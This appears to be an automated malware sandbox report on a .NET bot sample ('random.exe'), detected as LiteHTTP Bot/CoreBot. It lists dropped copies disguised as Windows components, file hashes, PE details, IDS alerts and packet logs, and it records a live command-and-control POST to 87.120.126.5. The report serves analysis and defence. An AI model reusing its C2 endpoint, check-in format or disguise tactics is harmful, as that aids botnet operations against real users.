                          • Antivirus: ReversingLabs, Detection: 21%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g..............0.................. ........@.. ....................................`.................................<...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H........W...O...........................................................0..8.......s=.....(....}......}......}.....|......(...+.|....(....*.0..r........(.....(.......(.....(.....(....-.r...p+.r...p.(.....(......(.........J...%.r...p.%..(/....%.r...p.%..(/....%.r)..p.%..(/....%.r3..p.%..(/....%.r=..p.%....(/....%..rG..p.%....(/....%..rQ..p.%..~....(/....%..r[..p.%..~....(/....(......~......(....(0.......re..p(........,..rm..p(......J.....r...po........9.........L...%..:.o ...

                          C:\Users\user\OneDrive\windows portable devices.exe:Zone.Identifier

                          Download File
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:false
                          Preview:[ZoneTransfer]....ZoneId=0

                          C:\Users\user\OneDrive\windows sidebar.exe

                          Download File
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):38400
                          Entropy (8bit):5.495343186946422
                          Encrypted:false
                          SSDEEP:768:XL5VwLMjxZRdazKglRzlllllllFIEDGGFbd4m60/c11UhOo:b5eg1ZRdazKglRzlllllllFVGGFbWQGK
                          MD5:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          SHA1:6B804AAD52F0DFDA2303DDE5C0E641BB20F14FC2
                          SHA-256:71CFDBE5A32FB5CB2A5EFF926C8B9000B231F4990B258872E7CF3A0E4C46BCCF
                          SHA-512:8A331CE713F81BC3050E80CBCA8D6E305EDE44E28684DBCA4E59C2E5FF7D0A05AD50F65DC4D2258FA64110030EC4F9ACBCF5D3E6BA273345BE4FB00C6016EB35
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\OneDrive\windows sidebar.exe, Author: Joe Security
                          • Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\OneDrive\windows sidebar.exe, Author: ditekSHen
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 21%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g..............0.................. ........@.. ....................................`.................................<...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H........W...O...........................................................0..8.......s=.....(....}......}......}.....|......(...+.|....(....*.0..r........(.....(.......(.....(.....(....-.r...p+.r...p.(.....(......(.........J...%.r...p.%..(/....%.r...p.%..(/....%.r)..p.%..(/....%.r3..p.%..(/....%.r=..p.%....(/....%..rG..p.%....(/....%..rQ..p.%..~....(/....%..r[..p.%..~....(/....(......~......(....(0.......re..p(........,..rm..p(......J.....r...po........9.........L...%..:.o ...

                          C:\Users\user\OneDrive\windows sidebar.exe:Zone.Identifier

                          Download File
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:false
                          Preview:[ZoneTransfer]....ZoneId=0

                          C:\Users\user\OneDrive\windowspowershell.exe

                          Download File
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):38400
                          Entropy (8bit):5.495343186946422
                          Encrypted:false
                          SSDEEP:768:XL5VwLMjxZRdazKglRzlllllllFIEDGGFbd4m60/c11UhOo:b5eg1ZRdazKglRzlllllllFVGGFbWQGK
                          MD5:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          SHA1:6B804AAD52F0DFDA2303DDE5C0E641BB20F14FC2
                          SHA-256:71CFDBE5A32FB5CB2A5EFF926C8B9000B231F4990B258872E7CF3A0E4C46BCCF
                          SHA-512:8A331CE713F81BC3050E80CBCA8D6E305EDE44E28684DBCA4E59C2E5FF7D0A05AD50F65DC4D2258FA64110030EC4F9ACBCF5D3E6BA273345BE4FB00C6016EB35
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\OneDrive\windowspowershell.exe, Author: Joe Security
                          • Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\OneDrive\windowspowershell.exe, Author: ditekSHen
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 21%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g..............0.................. ........@.. ....................................`.................................<...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H........W...O...........................................................0..8.......s=.....(....}......}......}.....|......(...+.|....(....*.0..r........(.....(.......(.....(.....(....-.r...p+.r...p.(.....(......(.........J...%.r...p.%..(/....%.r...p.%..(/....%.r)..p.%..(/....%.r3..p.%..(/....%.r=..p.%....(/....%..rG..p.%....(/....%..rQ..p.%..~....(/....%..r[..p.%..~....(/....(......~......(....(0.......re..p(........,..rm..p(......J.....r...po........9.........L...%..:.o ...

                          C:\Users\user\OneDrive\windowspowershell.exe:Zone.Identifier

                          Download File
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:false
                          Preview:[ZoneTransfer]....ZoneId=0

                          \Device\Null

                          Download File
                          Process:C:\Windows\SysWOW64\PING.EXE
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):275
                          Entropy (8bit):4.825671547285939
                          Encrypted:false
                          SSDEEP:6:PzXULmWxHLTpUrhaGbsW3CNcwAFeMmvVOIHJFxMVlmJHaVFhZIhIt3:P+pTpchaGbsTDAFSkIrxMVlmJHaV5t3
                          MD5:9EE0B7EDC68864CD9E69E2682823B251
                          SHA1:A89692239FCACCDA7C76743DEDF8EB2F244389D3
                          SHA-256:0736A9B3859B3B86C63FA64B4ED9DD3B44BC6EC639FD3CDB4DC738AE1C9A7065
                          SHA-512:6943B470836443868A1B9A0996F1E866BC7BC0D2EFD7ED22224C53065EB51C4393C369BA8DA99F104D90047C6F021C6F2642C8EC96786790EC6BEE76EF5E963E
                          Malicious:false
                          Preview:..Pinging 1.1.1.1 with 32 bytes of data:..Reply from 1.1.1.1: bytes=32 time=8ms TTL=51....Ping statistics for 1.1.1.1:.. Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 8ms, Maximum = 8ms, Average = 8ms..

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Entropy (8bit):5.495343186946422
                          TrID:
                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                          • Win32 Executable (generic) a (10002005/4) 49.78%
                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                          • Generic Win/DOS Executable (2004/3) 0.01%
                          • DOS Executable Generic (2002/1) 0.01%
                          File name:random.exe
                          File size:38'400 bytes
                          MD5:e2e13615dffaff99a1d0cd9d32c4cf80
                          SHA1:6b804aad52f0dfda2303dde5c0e641bb20f14fc2
                          SHA256:71cfdbe5a32fb5cb2a5eff926c8b9000b231f4990b258872e7cf3a0e4c46bccf
                          SHA512:8a331ce713f81bc3050e80cbca8d6e305ede44e28684dbca4e59c2e5ff7d0a05ad50f65dc4d2258fa64110030ec4f9acbcf5d3e6ba273345be4fb00c6016eb35
                          SSDEEP:768:XL5VwLMjxZRdazKglRzlllllllFIEDGGFbd4m60/c11UhOo:b5eg1ZRdazKglRzlllllllFVGGFbWQGK
                          TLSH:0B032A0863DC8753E2EF5BB89C7546054771A227EA23F74E2DCCB0D919A73898E407A7
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g..............0.................. ........@.. ....................................`................................

                          File Icon

                          Icon Hash:00928e8e8686b000

                          Static PE Info

                          General

                          Entrypoint:0x40a88e
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Time Stamp:0x6787E2E7 [Wed Jan 15 16:31:35 2025 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                          Entrypoint Preview

                          Instruction
                          jmp dword ptr [00402000h]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0xa83c0x4f.text
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x608.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xe0000xc.reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG0xa7040x1c.text
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x20000x88940x8a005b02882ffa32bbb336d9612e2f8580cfFalse0.4782325634057971data5.656924457038294IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .rsrc0xc0000x6080x800de2bde659b3e75e047cb6b1cae165656False0.32958984375data3.445679059183643IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .reloc0xe0000xc0x20037ec8b9403511a13b67b13edb5115722False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                          Resources

                          NameRVASizeTypeLanguageCountryZLIB Complexity
                          RT_VERSION0xc0900x378data0.4155405405405405
                          RT_MANIFEST0xc4180x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                          Imports

                          DLLImport
                          mscoree.dll_CorExeMain

                          Network Behavior

                          Suricata IDS Alerts

                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                          2025-01-15T18:11:02.890852+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.95923987.120.126.580TCP
                          2025-01-15T18:11:03.186880+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.95923987.120.126.580TCP
                          2025-01-15T18:11:03.186880+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.95923987.120.126.580TCP
                          2025-01-15T18:11:05.693290+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.95923987.120.126.580TCP
                          2025-01-15T18:11:05.950275+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.95923987.120.126.580TCP
                          2025-01-15T18:11:05.950275+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.95923987.120.126.580TCP
                          2025-01-15T18:11:06.123167+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.95923987.120.126.580TCP
                          2025-01-15T18:11:06.343152+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.95923987.120.126.580TCP
                          2025-01-15T18:11:06.343152+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.95923987.120.126.580TCP

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Jan 15, 2025 18:10:41.945537090 CET5923053192.168.2.9162.159.36.2
                          Jan 15, 2025 18:10:41.950320959 CET5359230162.159.36.2192.168.2.9
                          Jan 15, 2025 18:10:41.950413942 CET5923053192.168.2.9162.159.36.2
                          Jan 15, 2025 18:10:41.955367088 CET5359230162.159.36.2192.168.2.9
                          Jan 15, 2025 18:10:42.406455994 CET5923053192.168.2.9162.159.36.2
                          Jan 15, 2025 18:10:42.411478043 CET5359230162.159.36.2192.168.2.9
                          Jan 15, 2025 18:10:42.411540031 CET5923053192.168.2.9162.159.36.2
                          Jan 15, 2025 18:11:02.396034002 CET5923980192.168.2.987.120.126.5
                          Jan 15, 2025 18:11:02.538949013 CET805923987.120.126.5192.168.2.9
                          Jan 15, 2025 18:11:02.539056063 CET5923980192.168.2.987.120.126.5
                          Jan 15, 2025 18:11:02.539299965 CET5923980192.168.2.987.120.126.5
                          Jan 15, 2025 18:11:02.544061899 CET805923987.120.126.5192.168.2.9
                          Jan 15, 2025 18:11:02.890851974 CET5923980192.168.2.987.120.126.5
                          Jan 15, 2025 18:11:02.895908117 CET805923987.120.126.5192.168.2.9
                          Jan 15, 2025 18:11:03.143078089 CET805923987.120.126.5192.168.2.9
                          Jan 15, 2025 18:11:03.186880112 CET5923980192.168.2.987.120.126.5
                          Jan 15, 2025 18:11:03.276634932 CET805923987.120.126.5192.168.2.9
                          Jan 15, 2025 18:11:03.327486038 CET5923980192.168.2.987.120.126.5
                          Jan 15, 2025 18:11:03.428124905 CET5924080192.168.2.9104.21.21.16
                          Jan 15, 2025 18:11:03.433022022 CET8059240104.21.21.16192.168.2.9
                          Jan 15, 2025 18:11:03.433114052 CET5924080192.168.2.9104.21.21.16
                          Jan 15, 2025 18:11:03.437057972 CET5924080192.168.2.9104.21.21.16
                          Jan 15, 2025 18:11:03.441881895 CET8059240104.21.21.16192.168.2.9
                          Jan 15, 2025 18:11:04.169414997 CET8059240104.21.21.16192.168.2.9
                          Jan 15, 2025 18:11:04.171045065 CET59241443192.168.2.9104.21.21.16
                          Jan 15, 2025 18:11:04.171102047 CET44359241104.21.21.16192.168.2.9
                          Jan 15, 2025 18:11:04.171180964 CET59241443192.168.2.9104.21.21.16
                          Jan 15, 2025 18:11:04.183038950 CET59241443192.168.2.9104.21.21.16
                          Jan 15, 2025 18:11:04.183057070 CET44359241104.21.21.16192.168.2.9
                          Jan 15, 2025 18:11:04.218164921 CET5924080192.168.2.9104.21.21.16
                          Jan 15, 2025 18:11:04.678117037 CET44359241104.21.21.16192.168.2.9
                          Jan 15, 2025 18:11:04.678313017 CET59241443192.168.2.9104.21.21.16
                          Jan 15, 2025 18:11:04.680404902 CET59241443192.168.2.9104.21.21.16
                          Jan 15, 2025 18:11:04.680427074 CET44359241104.21.21.16192.168.2.9
                          Jan 15, 2025 18:11:04.680808067 CET44359241104.21.21.16192.168.2.9
                          Jan 15, 2025 18:11:04.733758926 CET59241443192.168.2.9104.21.21.16
                          Jan 15, 2025 18:11:04.742912054 CET59241443192.168.2.9104.21.21.16
                          Jan 15, 2025 18:11:04.783339024 CET44359241104.21.21.16192.168.2.9
                          Jan 15, 2025 18:11:05.394527912 CET44359241104.21.21.16192.168.2.9
                          Jan 15, 2025 18:11:05.394625902 CET44359241104.21.21.16192.168.2.9
                          Jan 15, 2025 18:11:05.394656897 CET44359241104.21.21.16192.168.2.9
                          Jan 15, 2025 18:11:05.394686937 CET44359241104.21.21.16192.168.2.9
                          Jan 15, 2025 18:11:05.394720078 CET44359241104.21.21.16192.168.2.9
                          Jan 15, 2025 18:11:05.394722939 CET59241443192.168.2.9104.21.21.16
                          Jan 15, 2025 18:11:05.394745111 CET44359241104.21.21.16192.168.2.9
                          Jan 15, 2025 18:11:05.394803047 CET59241443192.168.2.9104.21.21.16
                          Jan 15, 2025 18:11:05.394803047 CET59241443192.168.2.9104.21.21.16
                          Jan 15, 2025 18:11:05.394814014 CET44359241104.21.21.16192.168.2.9
                          Jan 15, 2025 18:11:05.394910097 CET44359241104.21.21.16192.168.2.9
                          Jan 15, 2025 18:11:05.398807049 CET59241443192.168.2.9104.21.21.16
                          Jan 15, 2025 18:11:05.398813963 CET44359241104.21.21.16192.168.2.9
                          Jan 15, 2025 18:11:05.399307013 CET44359241104.21.21.16192.168.2.9
                          Jan 15, 2025 18:11:05.399349928 CET44359241104.21.21.16192.168.2.9
                          Jan 15, 2025 18:11:05.399394989 CET59241443192.168.2.9104.21.21.16
                          Jan 15, 2025 18:11:05.399401903 CET44359241104.21.21.16192.168.2.9
                          Jan 15, 2025 18:11:05.402787924 CET59241443192.168.2.9104.21.21.16
                          Jan 15, 2025 18:11:05.487871885 CET44359241104.21.21.16192.168.2.9
                          Jan 15, 2025 18:11:05.487942934 CET44359241104.21.21.16192.168.2.9
                          Jan 15, 2025 18:11:05.487977982 CET44359241104.21.21.16192.168.2.9
                          Jan 15, 2025 18:11:05.488008976 CET44359241104.21.21.16192.168.2.9
                          Jan 15, 2025 18:11:05.488064051 CET59241443192.168.2.9104.21.21.16
                          Jan 15, 2025 18:11:05.488099098 CET44359241104.21.21.16192.168.2.9
                          Jan 15, 2025 18:11:05.488112926 CET59241443192.168.2.9104.21.21.16
                          Jan 15, 2025 18:11:05.488202095 CET44359241104.21.21.16192.168.2.9
                          Jan 15, 2025 18:11:05.488230944 CET44359241104.21.21.16192.168.2.9
                          Jan 15, 2025 18:11:05.488275051 CET44359241104.21.21.16192.168.2.9
                          Jan 15, 2025 18:11:05.488290071 CET59241443192.168.2.9104.21.21.16
                          Jan 15, 2025 18:11:05.488297939 CET44359241104.21.21.16192.168.2.9
                          Jan 15, 2025 18:11:05.488308907 CET59241443192.168.2.9104.21.21.16
                          Jan 15, 2025 18:11:05.489065886 CET44359241104.21.21.16192.168.2.9
                          Jan 15, 2025 18:11:05.489099979 CET44359241104.21.21.16192.168.2.9
                          Jan 15, 2025 18:11:05.489126921 CET59241443192.168.2.9104.21.21.16
                          Jan 15, 2025 18:11:05.489132881 CET44359241104.21.21.16192.168.2.9
                          Jan 15, 2025 18:11:05.489165068 CET44359241104.21.21.16192.168.2.9
                          Jan 15, 2025 18:11:05.489193916 CET44359241104.21.21.16192.168.2.9
                          Jan 15, 2025 18:11:05.489206076 CET59241443192.168.2.9104.21.21.16
                          Jan 15, 2025 18:11:05.489211082 CET44359241104.21.21.16192.168.2.9
                          Jan 15, 2025 18:11:05.489250898 CET59241443192.168.2.9104.21.21.16
                          Jan 15, 2025 18:11:05.490011930 CET44359241104.21.21.16192.168.2.9
                          Jan 15, 2025 18:11:05.490072012 CET59241443192.168.2.9104.21.21.16
                          Jan 15, 2025 18:11:05.490077019 CET44359241104.21.21.16192.168.2.9
                          Jan 15, 2025 18:11:05.490119934 CET44359241104.21.21.16192.168.2.9
                          Jan 15, 2025 18:11:05.490206957 CET44359241104.21.21.16192.168.2.9
                          Jan 15, 2025 18:11:05.490257978 CET59241443192.168.2.9104.21.21.16
                          Jan 15, 2025 18:11:05.493446112 CET59241443192.168.2.9104.21.21.16
                          Jan 15, 2025 18:11:05.520499945 CET5923980192.168.2.987.120.126.5
                          Jan 15, 2025 18:11:05.525440931 CET805923987.120.126.5192.168.2.9
                          Jan 15, 2025 18:11:05.693058014 CET805923987.120.126.5192.168.2.9
                          Jan 15, 2025 18:11:05.693289995 CET5923980192.168.2.987.120.126.5
                          Jan 15, 2025 18:11:05.698153973 CET805923987.120.126.5192.168.2.9
                          Jan 15, 2025 18:11:05.949556112 CET805923987.120.126.5192.168.2.9
                          Jan 15, 2025 18:11:05.950274944 CET5923980192.168.2.987.120.126.5
                          Jan 15, 2025 18:11:05.950445890 CET5924080192.168.2.9104.21.21.16
                          Jan 15, 2025 18:11:05.955037117 CET805923987.120.126.5192.168.2.9
                          Jan 15, 2025 18:11:05.955831051 CET8059240104.21.21.16192.168.2.9
                          Jan 15, 2025 18:11:05.955914974 CET5924080192.168.2.9104.21.21.16
                          Jan 15, 2025 18:11:06.122931957 CET805923987.120.126.5192.168.2.9
                          Jan 15, 2025 18:11:06.123167038 CET5923980192.168.2.987.120.126.5
                          Jan 15, 2025 18:11:06.127976894 CET805923987.120.126.5192.168.2.9
                          Jan 15, 2025 18:11:06.301155090 CET805923987.120.126.5192.168.2.9
                          Jan 15, 2025 18:11:06.343152046 CET5923980192.168.2.987.120.126.5
                          Jan 15, 2025 18:11:06.399295092 CET5923980192.168.2.987.120.126.5
                          Jan 15, 2025 18:11:06.689896107 CET805923987.120.126.5192.168.2.9
                          Jan 15, 2025 18:11:06.689961910 CET5923980192.168.2.987.120.126.5
                          Jan 15, 2025 18:11:51.075861931 CET5924380192.168.2.987.120.126.5
                          Jan 15, 2025 18:11:51.230433941 CET5924480192.168.2.987.120.126.5
                          Jan 15, 2025 18:11:52.077617884 CET5924380192.168.2.987.120.126.5
                          Jan 15, 2025 18:11:52.218223095 CET5924480192.168.2.987.120.126.5
                          Jan 15, 2025 18:11:54.077651024 CET5924380192.168.2.987.120.126.5
                          Jan 15, 2025 18:11:54.218386889 CET5924480192.168.2.987.120.126.5
                          Jan 15, 2025 18:11:58.077642918 CET5924380192.168.2.987.120.126.5
                          Jan 15, 2025 18:11:58.218322039 CET5924480192.168.2.987.120.126.5
                          Jan 15, 2025 18:12:05.117979050 CET5924580192.168.2.987.120.126.5
                          Jan 15, 2025 18:12:06.077642918 CET5924380192.168.2.987.120.126.5
                          Jan 15, 2025 18:12:06.124514103 CET5924580192.168.2.987.120.126.5
                          Jan 15, 2025 18:12:06.218337059 CET5924480192.168.2.987.120.126.5
                          Jan 15, 2025 18:12:08.124506950 CET5924580192.168.2.987.120.126.5

                          UDP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Jan 15, 2025 18:10:41.944142103 CET5352959162.159.36.2192.168.2.9
                          Jan 15, 2025 18:10:42.708591938 CET53598741.1.1.1192.168.2.9
                          Jan 15, 2025 18:11:03.405869007 CET5228853192.168.2.91.1.1.1
                          Jan 15, 2025 18:11:03.416121006 CET53522881.1.1.1192.168.2.9

                          ICMP Packets

                          TimestampSource IPDest IPChecksumCodeType
                          Jan 15, 2025 18:11:05.618480921 CET192.168.2.91.1.1.14d5aEcho
                          Jan 15, 2025 18:11:05.624819994 CET1.1.1.1192.168.2.9555aEcho Reply

                          DNS Queries

                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Jan 15, 2025 18:11:03.405869007 CET192.168.2.91.1.1.10x78fcStandard query (0)tmpfiles.orgA (IP address)IN (0x0001)false

                          DNS Answers

                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Jan 15, 2025 18:09:57.002959967 CET1.1.1.1192.168.2.90x3d8aNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                          Jan 15, 2025 18:09:57.002959967 CET1.1.1.1192.168.2.90x3d8aNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                          Jan 15, 2025 18:11:03.416121006 CET1.1.1.1192.168.2.90x78fcNo error (0)tmpfiles.org104.21.21.16A (IP address)IN (0x0001)false
                          Jan 15, 2025 18:11:03.416121006 CET1.1.1.1192.168.2.90x78fcNo error (0)tmpfiles.org172.67.195.247A (IP address)IN (0x0001)false

                          HTTP Request Dependency Graph

                          • tmpfiles.org
                          • 87.120.126.5

                          HTTP Packets

                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.95923987.120.126.5801380C:\Users\user\Desktop\random.exe
                          TimestampBytes transferredDirectionData
                          Jan 15, 2025 18:11:02.539299965 CET218OUTPOST /VmCetSC7/page.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                          Host: 87.120.126.5
                          Content-Length: 367
                          Expect: 100-continue
                          Connection: Keep-Alive
                          Jan 15, 2025 18:11:02.890851974 CET367OUTData Raw: 69 64 3d 6c 72 36 6e 6e 62 4a 65 55 2f 6c 54 61 54 4a 4e 7e 39 33 4b 59 7a 53 77 6a 54 72 7a 31 35 52 52 59 58 62 71 54 43 34 4d 7a 35 77 45 67 52 64 43 6a 7a 38 7a 42 30 6f 6f 7e 62 7e 4a 70 4d 77 47 78 53 32 52 62 43 4d 63 68 34 69 7a 30 61 6d
